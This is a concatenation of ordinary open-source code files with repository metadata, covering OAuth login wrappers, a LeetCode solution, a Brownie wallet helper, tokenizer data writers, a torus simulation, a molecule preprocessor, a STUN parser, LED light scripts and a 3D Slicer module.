\n\n return self.service.get_authorize_url(self.request_token)\n\n def get_session(self, oauth_verifier):\n if not self.request_token:\n raise Exception('You should call get_request_token first')\n\n return self.service.get_auth_session(\n self.request_token, self.request_token_secret,\n params={'oauth_verifier': oauth_verifier})\n\n\nclass FacebookConnect(BaseConnect):\n \"\"\"\n Flow to authenticate a user:\n - get_authorize_url()\n - Redirects user to this url, wait for callback and get the\n 'code' param\n - get_session(code, redirect_uri)\n\n You'll end up with a rauth.session.OAuth2Session and you can use the\n api like this:\n # get the info about the logged-in user\n session.get('me')\n \"\"\"\n\n name = 'facebook'\n authorize_url = 'https://graph.facebook.com/oauth/authorize'\n access_token_url = 'https://graph.facebook.com/oauth/access_token'\n base_url = 'https://graph.facebook.com/'\n\n def __init__(self, client_id, secret):\n super(FacebookConnect, self).__init__(\n client_id=client_id,\n secret=secret,\n name=self.name,\n authorize_url=self.authorize_url,\n access_token_url=self.access_token_url,\n base_url=self.base_url)\n\n\nclass GooglePlusConnect(BaseConnect):\n \"\"\"\n Flow to authenticate a user:\n - get_authorize_url()\n - Redirects user to this url, wait for callback and get the\n 'code' param\n - get_session(code, redirect_uri)\n\n You'll end up with a rauth.session.OAuth2Session and you can use the\n api like this:\n # get the info about the logged-in user\n google_plus_connect.get_userinfo(session)\n \"\"\"\n name = 'google_plus'\n authorize_url = 'https://accounts.google.com/o/oauth2/auth'\n access_token_url = 'https://accounts.google.com/o/oauth2/token'\n base_url = 'https://www.googleapis.com/plus/v1/'\n\n def __init__(self, client_id, secret):\n super(GooglePlusConnect, self).__init__(\n client_id=client_id,\n secret=secret,\n name=self.name,\n authorize_url=self.authorize_url,\n access_token_url=self.access_token_url,\n base_url=self.base_url)\n\n def get_session(self, code, redirect_uri, *args, **kwargs):\n kwargs.update({\n 'code': code,\n 'redirect_uri': redirect_uri,\n 'client_id': self.service.client_id,\n 'client_secret': self.service.client_secret,\n 'grant_type': 'authorization_code'\n })\n response = self.service.get_raw_access_token(data=kwargs)\n response = response.json()\n return self.service.get_session(response['access_token'])\n\n def get_userinfo(self, session):\n # a rauth OAuth2Session is required; check by class name to avoid importing it\n if type(session).__name__ != 'OAuth2Session':\n raise Exception('Expected a rauth.session.OAuth2Session object, '\n 'instead got a %s' % (type(session)))\n return session.get(\n 'https://www.googleapis.com/oauth2/v1/userinfo').json()\n","repo_name":"raphapassini/rauth_wrapper","sub_path":"oauth_manager.py","file_name":"oauth_manager.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"27235246101","text":"#\n# @lc app=leetcode id=300 lang=python\n#\n# [300] Longest Increasing Subsequence\n#\nclass Solution(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # if not nums:\n # return 0\n # l = [1 for _ in range(len(nums))]\n # for i in range(1, len(nums)):\n # for j in range(i):\n # if nums[j] < nums[i]:\n # l[i] = max(l[i], l[j]+1)\n # return max(l) \n if not nums:\n return 0\n lst = [nums[0]]\n for n in nums[1:]:\n if n > lst[-1]:\n lst.append(n)\n continue\n \n left, right = 0, len(lst)-1\n while left < right:\n mid = (left + right) >> 1\n if 
lst[mid] >= n:\n right = mid\n else:\n left = mid + 1\n lst[left] = n\n return len(lst) \n\n","repo_name":"tangwz/leetcode","sub_path":"leetcode/python3/longest-increasing-subsequence.py","file_name":"longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"2375153798","text":"from brownie import accounts, config\nimport secrets\nimport json\n\n\ndef get_account():\n owner = accounts.add(config[\"wallets\"][\"from_key\"])\n print(\"==================================================\")\n print(f\"Address of the owner {owner.address}\")\n print(\"==================================================\")\n return owner\n\n\ndef create_wallet():\n private_key = secrets.token_hex(32)\n wallet = accounts.add(private_key=private_key)\n wallet_dict: dict = {\n \"address\": wallet.address,\n \"key\": f\"0x{private_key}\"\n }\n with open(\"wallet.json\", \"w\") as file:\n json.dump(wallet_dict, file)\n print(\"==================================================\")\n print(f\"Address of the wallet {wallet.address}\")\n print(\"=================================================\")\n return wallet.address\n","repo_name":"Muti-Kara/sylvest_token","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6260702683","text":"from common.csv_utils import CsvWriter\nfrom common.io import read_text_file, get_file_name, get_dir\nfrom utils.linq_tokenizr import linq_encode, linq_tokenize\nfrom utils.tsql_tokenizr import tsql_encode, tsql_tokenize\n\ndef write_train_csv(file: str):\n lines = read_text_file(file)\n out_file = \"./output/linq-translation.csv\"\n src_max_seq_length = 0\n tgt_max_seq_length = 0\n with CsvWriter(out_file) as csv:\n for idx, line in enumerate(lines):\n if idx % 2 == 0:\n linq_values = linq_encode(line)\n src_max_seq_length = max(len(linq_values), src_max_seq_length)\n csv.write(linq_values)\n else:\n sql_values = tsql_encode(line)\n tgt_max_seq_length = max(len(sql_values), tgt_max_seq_length)\n csv.write(sql_values)\n return src_max_seq_length, tgt_max_seq_length\n\n\ndef get_line_str(arr):\n return ' '.join(str(number) for number in arr)\n\ndef write_train_data(file: str):\n lines = read_text_file(file)\n out_file = \"./output/linq-translation.txt\"\n src_max_seq_length = 0\n tgt_max_seq_length = 0\n with open(out_file, \"w\", encoding='UTF-8') as f:\n for idx, line in enumerate(lines):\n if idx % 2 == 0:\n linq_values = linq_encode(line)\n src_max_seq_length = max(len(linq_values), src_max_seq_length)\n f.write(get_line_str(linq_values) + '\\n')\n else:\n sql_values = tsql_encode(line)\n tgt_max_seq_length = max(len(sql_values), tgt_max_seq_length)\n f.write(get_line_str(sql_values) + '\\n')\n return src_max_seq_length, tgt_max_seq_length\n\n\ndef flatten(l):\n return [item for sublist in l for item in sublist]\n\ndef write_tokens_data(file: str):\n lines = read_text_file(file)\n out_file = \"./output/linq-translation-tokens.txt\"\n def map_tokens(tokens):\n return map(lambda x: f\"{{{x.type}:{x.text}}}\", tokens)\n with CsvWriter(out_file) as csv:\n for idx, line in enumerate(lines):\n if idx % 2 == 0:\n linq_tokens = linq_tokenize(line)\n tokens = map_tokens(linq_tokens)\n csv.write(tokens)\n else:\n sql_tokens = tsql_tokenize(line)\n tokens = map_tokens(sql_tokens)\n 
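# Editorial note: map_tokens yields '{type:text}' strings, keeping both the\n # token kind and its surface form in one CSV cell for later round-tripping.\n 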
csv.write(tokens)\n\n\n","repo_name":"flashlin/Samples","sub_path":"Tempermonkey-vue3-tfjs/py/utils/linq_translation_data.py","file_name":"linq_translation_data.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"32003674600","text":"'''\n\n클래스\n 객체를 만드는 설계도\n 붕어빵 틀, 와플 기계\n 인스턴스화 - 메모리에 올리는 것\n\n객체(object)\n 현실 세계 존재 하는 물리적, 추상적 식별할 수 있는 모든 것\n ex) 컴퓨터, 학생, 주문, 배송\n\n객체 구성\n 생성자 - 초기화용\n 속성 값 - 변수\n 기능 - 메서드(함수)\n\n'''\n\n# Computer 클래스 정의\nclass Computer:\n \n # 첫번째 매개변수가 self 이므로 인스턴스 메소드이다\n # self를 제외한 나머지 매개변수에 실제로 사용될 데이터가 전달된다\n def set_spec(self, cpu, ram, vga, ssd):\n self.cpu = cpu\n # self.cpu: 멤버 변수, cpu: 지역 변수\n self.ram = ram\n self.vga = vga\n self.ssd = ssd\n\n def hardware_info(self):\n print('CPU = {}'.format(self.cpu))\n print('RAM = {}'.format(self.ram))\n print('VGA = {}'.format(self.vga))\n print('SSD = {}'.format(self.ssd))\n return\n\n# 객체 생성\ndesktop = Computer()\ndesktop.set_spec('i7', '16GB', 'GTX3060', '512GB')\ndesktop.hardware_info()\nprint()\n\ndesktop.cpu = 'i9'\ndesktop.hardware_info()\nprint()\n\nmacbook = Computer()\nmacbook.set_spec('M2', '16GB', 'M2', '512GB')\nmacbook.hardware_info()\nprint()\n\nprint(id(desktop)==id(macbook)) # False 같은 클래스지만 다른 객체\n# call by reference, 주소값으로 값을 호출 : id() 함수","repo_name":"Kimbabbab/pythonBasic","sub_path":"Day07/Section15/Ex15-1-object.py","file_name":"Ex15-1-object.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8265686279","text":"# torus environment\nfrom environment import super_environment\nimport constant\nfrom calculation import calc\n\nimport pygame\nimport random\nimport math\n\n\nclass TorusEnvironment(super_environment.Environment):\n def __init__(self, size_x, size_y):\n super().__init__(size_x, size_y)\n x_center = size_x / 2\n y_center = size_y / 2\n self.center_position = x_center, y_center\n\n @staticmethod\n def environment_type():\n return 'torus'\n\n def get_converted_position(self, position_before, position_after, radius):\n # if the position over the edge , go to opposite position.端に行ったら反対側に行く\n x = position_after[0]\n if x < 0:\n x += self.screen_size_x\n elif x > self.screen_size_x:\n x -= self.screen_size_x\n y = position_after[1]\n if y < 0:\n y += self.screen_size_y\n elif y > self.screen_size_y:\n y -= self.screen_size_y\n return x, y\n\n def max_distance(self):\n x = self.screen_size_x / 2\n y = self.screen_size_y / 2\n return math.sqrt(x * x + y * y)\n\n def position_number_torus(self, position):\n # 0:left above, 1:right above, 10:left below, 11:right below\n x = position[0]\n y = position[1]\n x_center = self.center_position[0]\n y_center = self.center_position[1]\n if x < x_center:\n # x is left\n if y < y_center:\n return 0\n return 10\n # x is right\n if y < y_center:\n return 1\n return 11\n\n def position_relation(self, po1, po2):\n # 0:same area, 1:po2 is right, 2:po2 is left, 3:po2 is above, 4:po2 is below, 13,14,23,24:po2 is diagonal\n area1 = self.position_number_torus(po1)\n area2 = self.position_number_torus(po2)\n dif = area1 - area2\n if dif == 0:\n return 'same'\n elif dif == 10:\n return 'above'\n elif dif == -10:\n return 'below'\n elif dif == 1:\n return 'left'\n elif dif == -1:\n return 'right'\n elif dif == 11:\n return 'left_above'\n elif dif == 9:\n return 'right_above'\n elif dif == -11:\n return 'right_below'\n elif dif == -9:\n return 'left_below'\n 
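# for quadrant codes {0, 1, 10, 11} the pairwise differences are exactly\n # 0, ±1, ±9, ±10 or ±11, so the final else can only fire on a coding error\n 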
else:\n print(\"error: not match the number in position_relation function in calc file\")\n return 'error'\n\n def smaller_dis_dire(self, dis_dire1, dis_dire2):\n # return the smaller one. pair of the distance and direction\n if dis_dire1[0] < dis_dire2[0]:\n return dis_dire1\n return dis_dire2\n\n def get_distance_direction_torus(self, po1, po2):\n relation = self.position_relation(po1, po2)\n dis_dire_normal = super().distance(po1, po2), super().aim_direction(po1, po2)\n if relation == 'same':\n return dis_dire_normal\n if relation == 'above':\n # po2 is above po1\n position_n = po2[0], po2[1] + self.screen_size_y\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'below':\n position_n = po2[0], po2[1] - self.screen_size_y\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'left':\n position_n = po2[0] + self.screen_size_x, po2[1]\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'right':\n position_n = po2[0] - self.screen_size_x, po2[1]\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'left_above':\n position_n1 = po2[0] + self.screen_size_x, po2[1] # right above\n position_n2 = po2[0] + self.screen_size_x, po2[1] + self.screen_size_y # right below\n position_n3 = po2[0], po2[1] + self.screen_size_y # left below\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n elif relation == 'right_above':\n position_n1 = po2[0] - self.screen_size_x, po2[1] # left above\n position_n2 = po2[0] - self.screen_size_x, po2[1] + self.screen_size_y # left below\n position_n3 = po2[0], po2[1] + self.screen_size_y # right below\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n elif relation == 'left_below':\n position_n1 = po2[0] + self.screen_size_x, po2[1] # right below\n position_n2 = po2[0] + self.screen_size_x, po2[1] - self.screen_size_y # right above\n position_n3 = po2[0], po2[1] - self.screen_size_y # left above\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, 
dis_dire3)\n return dis_dire\n elif relation == 'right_below':\n position_n1 = po2[0] - self.screen_size_x, po2[1] # left below\n position_n2 = po2[0] - self.screen_size_x, po2[1] - self.screen_size_y # left above\n position_n3 = po2[0], po2[1] - self.screen_size_y # right above\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n else:\n print(\"error: unknown relation in get_distance_direction_torus\")\n return 0, 0\n\n def distance(self, po1, po2):\n # calculate the distance.\n return self.get_distance_direction_torus(po1, po2)[0]\n\n def aim_direction(self, position_from, aim_position):\n # calculate the direction.\n return self.get_distance_direction_torus(position_from, aim_position)[1]\n\n","repo_name":"st34-satoshi/CAR","sub_path":"environment/torus_environment.py","file_name":"torus_environment.py","file_ext":"py","file_size_in_byte":7737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"69802353857","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Time : 2022/8/4 7:44 PM\n# @Author : daiyizheng\n# @Version:V 0.1\n# @File : moflow_preprocessor.py\n# @desc :\nfrom __future__ import annotations, print_function\nimport logging\nimport traceback\nfrom typing import List, Text, Tuple, Dict\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom rdkit import Chem\nfrom rdkit.Chem.rdchem import Mol\n\nfrom drugai.models.dataset import NumpyTupleDataset\nfrom ..message import Message\nfrom drugai.shared.preprocess.preprocessor import Preprocessor\nfrom drugai.utils.common import type_check_num_atoms\n\nlogger = logging.getLogger(__name__)\n\nATOM_VALENCY = {6:4, 7:3, 8:2, 9:1, 15:3, 16:2, 17:1, 35:1, 53:1}\n\nclass MoFlowPreprocessor(Preprocessor):\n def __init__(self, \n max_atoms:int=None,\n **kwargs\n )->None:\n if max_atoms is None:\n raise ValueError('max_atoms must be provided')\n self.max_atoms = max_atoms\n self.bond_type_token_to_id = {\n Chem.BondType.SINGLE: 0,\n Chem.BondType.DOUBLE: 1,\n Chem.BondType.TRIPLE: 2,\n Chem.BondType.AROMATIC: 3\n }\n super(MoFlowPreprocessor, self).__init__(**kwargs)\n \n def prepare_smiles_and_mol(self, mol):\n \"\"\"Prepare `smiles` and `mol` for the following preprocessing steps.\n This method is called by the parser class before `get_input_features`.\n It may be overridden to support custom `smiles`/`mol` extraction.\n \"\"\"\n # Note that a SMILES expression is not unique;\n # we obtain the canonical SMILES, which is unique for a given `mol`\n canonical_smiles = Message.mol_to_smiles(mol=mol, isomericSmiles=False, canonical=True)\n canonical_mol = Message.smiles_to_mol(canonical_smiles)\n if self.add_Hs:\n canonical_mol = Message.add_Hs(canonical_mol)\n if self.kekulize:\n Message.kekulize(canonical_mol)\n return canonical_smiles, canonical_mol\n\n\n def get_input_features(self, \n mol:Mol\n )->Tuple[np.ndarray, np.ndarray]:\n\n type_check_num_atoms(mol, self.max_atoms)\n atom_array = Message.get_atom_ids(mol=mol, max_length=self.max_atoms, atom_token_to_id=self.atom_token_to_id)\n adj_array = self.construct_discrete_edge_matrix(mol, out_size=self.max_atoms)\n return 
atom_array, adj_array\n\n def construct_discrete_edge_matrix(self, \n mol:Mol, \n out_size:int=None\n )->np.ndarray:\n \"\"\"Returns the edge-type dependent adjacency matrix of the given molecule.\"\"\"\n if mol is None:\n raise ValueError('mol is None')\n \n N = Message.get_atom_num(mol=mol)\n\n if out_size is None or out_size <= 0:\n raise ValueError(\"out_size must be provided and > 0\")\n elif out_size >= N:\n size = out_size\n else:\n raise ValueError(\n 'out_size {} is smaller than number of atoms in mol {}, smiles is {}'\n .format(out_size, N, Message.mol_to_smiles(mol=mol)))\n\n adjs = np.zeros((4, size, size), dtype=np.float32)\n\n \n for bond in mol.GetBonds():\n bond_type = bond.GetBondType()\n ch = self.bond_type_token_to_id[bond_type]\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n adjs[ch, i, j] = 1.0\n adjs[ch, j, i] = 1.0\n return adjs \n \n def pre_process(self, \n dataset:List,\n **kwargs\n )->Tuple:\n \"\"\"Preprocess the dataset.\n This method is called by the parser class before `get_input_features`.\n \"\"\"\n # filter out molecules that fail to parse\n logger.info(\"Preprocessing dataset start...\")\n c_mols = []\n c_smiles = []\n for message in tqdm(dataset, total=len(dataset)):\n try:\n mol = Message.smiles_to_mol(message.smiles)\n canonical_smiles, mol = self.prepare_smiles_and_mol(mol)\n c_mols.append(mol)\n c_smiles.append(canonical_smiles)\n \n except Exception as e:\n logger.warning('parse(), type: {}, {}'.format(type(e).__name__, e.args))\n logger.info(traceback.format_exc())\n continue\n \n if self.__dict__.get(\"max_atoms\", None) is not None:\n c_mols = self.filter_mol(c_mols)\n \n if self.__dict__.get('bond_type_token_to_id', None) is None:\n self.bond_type_token_to_id, self.bond_type_id_to_token = self.bond_type_map(c_mols)\n \n if self.__dict__.get(\"atom_token_to_id\", None) is None:\n self.atom_token_to_id, self.atom_id_to_token = self.atom_type_map(c_mols)\n \n logger.info(\"load atom features and adj features start...\")\n messages = []\n for c_m, c_s in tqdm(list(zip(c_mols,c_smiles))):\n atom_features, adj_features = self.get_input_features(c_m)\n messages.append(Message(smiles=c_s, atom_matrix=atom_features, adj_matrix=adj_features))\n logger.info(\"load atom features and adj features end...\")\n\n logger.info(\"Preprocessing dataset end...\")\n return NumpyTupleDataset(datasets = messages, **kwargs)","repo_name":"daiyizheng/drugai","sub_path":"drugai/shared/preprocess/moflow_preprocessor.py","file_name":"moflow_preprocessor.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"34076039747","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('', RedirectView.as_view(url='notes/'), name='index'),\n path('notes/', include('notes.urls', namespace='notes')),\n path('accounts/', include('accounts.urls', namespace='accounts')),\n path('api/', include('api.urls', namespace='api')),\n path('admin/', admin.site.urls),\n]\n","repo_name":"TonikX/ITMO_ICT_WebDevelopment_2021-2022","sub_path":"students/K33402/Komarov_Georgy/LAB2/elevennote/src/config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"15009564630","text":"\"\"\"\nSimple Traversal of UDP through NAT (STUN).\nRFC 3489\nhttp://tools.ietf.org/html/rfc3489\n\"\"\"\nimport logging\n\nfrom 
pypacker.pypacker import Packet\nfrom pypacker import triggerlist\nfrom pypacker.structcbs import unpack_H\n\nlogger = logging.getLogger(\"pypacker\")\n\n# Message Types\nBINDING_REQUEST = 0x0001\nBINDING_RESPONSE = 0x0101\nBINDING_ERROR_RESPONSE = 0x0111\nSHARED_SECRET_REQUEST = 0x0002\nSHARED_SECRET_RESPONSE = 0x0102\nSHARED_SECRET_ERROR_RESPONSE = 0x0112\n\n# Message Attributes\nMAPPED_ADDRESS = 0x0001\nRESPONSE_ADDRESS = 0x0002\nCHANGE_REQUEST = 0x0003\nSOURCE_ADDRESS = 0x0004\nCHANGED_ADDRESS = 0x0005\nUSERNAME = 0x0006\nPASSWORD = 0x0007\nMESSAGE_INTEGRITY = 0x0008\nERROR_CODE = 0x0009\nUNKNOWN_ATTRIBUTES = 0x000a\nREFLECTED_FROM = 0x000b\n\n\nclass StunAttr(Packet):\n\t__hdr__ = (\n\t\t(\"type\", \"H\", 0),\n\t\t(\"len\", \"H\", 0),\n\t)\n\n\nclass STUN(Packet):\n\t# 20 byte header followed by 0 or more attribute TLVs.\n\t__hdr__ = (\n\t\t(\"type\", \"H\", 0),\n\t\t(\"len\", \"H\", 0),\n\t\t(\"cookie\", \"I\", 0),\n\t\t(\"xid\", \"12s\", b\"\\x00\" * 12),\n\t\t(\"attrs\", None, triggerlist.TriggerList)\n\t)\n\n\t@staticmethod\n\tdef __parse_attrs(buf):\n\t\tattributes = []\n\t\toff = 0\n\n\t\t# t:2 l:2 v:x\n\t\twhile off < len(buf):\n\t\t\tl_content = unpack_H(buf[off + 2: off + 4])[0]\n\t\t\tpadding = (4 - (l_content % 4)) % 4\n\t\t\tl_total = l_content + padding + 2 + 2\n\t\t\t#logger.debug(\"STUN attr l_content: %d, padding: %d, value: %s\" %\n\t\t\t#\t (l_content, padding, buf[off : off + l_total]))\n\t\t\tattributes.append(StunAttr(buf[off: off + l_total]))\n\t\t\toff += l_total\n\t\treturn attributes\n\n\tdef _dissect(self, buf):\n\t\t# logger.debug(\"dissecting: %s\" % buf)\n\t\tself._init_triggerlist(\"attrs\", buf[20:], self.__parse_attrs)\n\t\treturn len(buf)\n","repo_name":"mike01/pypacker","sub_path":"pypacker/layer567/stun.py","file_name":"stun.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"79"} +{"seq_id":"10261456390","text":"import board\nimport neopixel\nimport time\nimport sys\nimport signal\n\nnum_pixels = 150\npixels = neopixel.NeoPixel(board.D18, num_pixels, brightness=0.2, auto_write=False)\n\ndef end(signum, frame):\n pixels.fill((0, 0, 0))\n pixels.show()\n sys.exit(0)\n\nchristmas_colors = [(0, 255, 0), (255, 0, 0), (255, 255, 255)]\nhanukkah_colors = [(0, 0, 255), (255, 255, 255), (0, 0, 255)]\nkwanzaa_colors = [(255, 0, 0), (0, 255, 0), (0, 0, 0)]\n\ncolor_list = []\ncolor_list.append(christmas_colors)\ncolor_list.append(hanukkah_colors)\ncolor_list.append(kwanzaa_colors)\n\nsignal.signal(signal.SIGTERM, end)\nsignal.signal(signal.SIGINT, end)\n\nj = 0\nk = 0\nx = 0\ny = x + 1\nz = 0\nwhile True: \n for i in range(0, num_pixels, 10):\n for j in range(10):\n if ( i % 3 == x ):\n pixels[i+j] = color_list[z][0]\n elif ( i % 3 == y ):\n pixels[i+j] = color_list[z][1]\n else:\n pixels[i+j] = color_list[z][2]\n \n pixels.show()\n time.sleep(0.5)\n \n x = (x + 1) % 3\n y = (y + 1) % 3\n k = k + 1\n if (k % 150) == 0:\n z = (z + 1) % 3\n","repo_name":"p8walsh/WS2812LED_PythonCode","sub_path":"holiday_flash.py","file_name":"holiday_flash.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38075572265","text":"import os\nimport unittest\nimport vtk, qt, ctk, slicer\nfrom slicer.ScriptedLoadableModule import *\nimport logging\n\n#\n# ScrModule\n#\n\nclass ScrModule(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n 
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"ScrModule\" # TODO make this more human readable by adding spaces\n self.parent.categories = [\"Examples\"]\n self.parent.dependencies = []\n self.parent.contributors = [\"John Doe (AnyWare Corp.)\"] # replace with \"Firstname Lastname (Organization)\"\n self.parent.helpText = \"\"\"\n This is an example of a scripted loadable module bundled in an extension.\n It lets the user pick a model, adjust its opacity, and toggle its visibility.\n \"\"\"\n self.parent.acknowledgementText = \"\"\"\n This file was originally developed by Jean-Christophe Fillion-Robin, Kitware Inc.\n and Steve Pieper, Isomics, Inc. and was partially funded by NIH grant 3P41RR013218-12S1.\n\"\"\" # replace with organization, grant and thanks.\n\n#\n# ScrModuleWidget\n#\n\nclass ScrModuleWidget(ScriptedLoadableModuleWidget):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n # Instantiate and connect widgets ...\n \n \n #\n # Model Area\n #\n modelsCollapsibleButton = ctk.ctkCollapsibleButton()\n modelsCollapsibleButton.text = \"Models\"\n self.layout.addWidget(modelsCollapsibleButton)\n \n modelsFormLayout = qt.QFormLayout(modelsCollapsibleButton)\n \n #\n # Model Combo\n #\n \n self.modelsSelector = slicer.qMRMLNodeComboBox()\n self.modelsSelector.nodeTypes = [\"vtkMRMLModelNode\"]\n self.modelsSelector.selectNodeUponCreation = True\n self.modelsSelector.addEnabled = False\n self.modelsSelector.removeEnabled = True\n self.modelsSelector.noneEnabled = True\n self.modelsSelector.showHidden = False\n self.modelsSelector.showChildNodeTypes = False\n self.modelsSelector.setMRMLScene( slicer.mrmlScene )\n self.modelsSelector.setToolTip( \"Pick the input to the algorithm.\" )\n modelsFormLayout.addRow(\"Input Model: \", self.modelsSelector)\n\n #\n # opacity value\n #\n self.modelOpacitySliderWidget = ctk.ctkSliderWidget()\n self.modelOpacitySliderWidget.singleStep = 0.1\n self.modelOpacitySliderWidget.minimum = 0\n self.modelOpacitySliderWidget.maximum = 100\n self.modelOpacitySliderWidget.value = 50\n self.modelOpacitySliderWidget.setToolTip(\"Set the opacity of the selected model.\")\n modelsFormLayout.addRow(\"Model opacity\", self.modelOpacitySliderWidget)\n\n #\n # Show Button\n #\n self.showHideButton = qt.QPushButton(\"Show/Hide\")\n self.showHideButton.toolTip = \"Show/hide the model\"\n self.showHideButton.enabled = True\n modelsFormLayout.addRow(self.showHideButton)\n\n\n # connections\n\n self.showHideButton.connect('clicked(bool)', self.onShowHideButton)\n self.modelOpacitySliderWidget.connect('valueChanged(double)', self.onSliderValueChanged)\n\n # Add vertical spacer\n self.layout.addStretch(1)\n\n def cleanup(self):\n pass\n\n def onShowHideButton(self):\n logic = ScrModuleLogic()\n logic.showHideModel(self.modelsSelector.currentNode())\n\n def onSliderValueChanged(self):\n logic = ScrModuleLogic()\n opacityValue = self.modelOpacitySliderWidget.value\n logic.changeOpacity(self.modelsSelector.currentNode(), opacityValue)\n\n#\n# ScrModuleLogic\n#\n\nclass ScrModuleLogic(ScriptedLoadableModuleLogic):\n \"\"\"This class should implement all the actual\n computation done by your module. 
The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n \n def isValidModelData(self, modelNode):\n \"\"\"Returns False if no model node is given\n \"\"\"\n if not modelNode:\n logging.debug('isValidModelData failed: no model node defined')\n return False\n return True\n\n\n def changeOpacity(self, model, opacityVal):\n if not self.isValidModelData(model):\n slicer.util.errorDisplay('Wrong input model')\n return False\n n = model.GetDisplayNode()\n n.SetOpacity(opacityVal/100)\n return True\n\n def showHideModel(self, model):\n if not self.isValidModelData(model):\n slicer.util.errorDisplay('Wrong input model')\n return False\n n = model.GetDisplayNode()\n v = n.GetVisibility()\n if v == 1:\n n.SetVisibility(0)\n else:\n n.SetVisibility(1)\n\n\nclass ScrModuleTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear(0)\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n self.test_ScrModule1()\n\n def test_ScrModule1(self):\n \"\"\" Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. For example, if a developer removes a feature that you depend on,\n your test 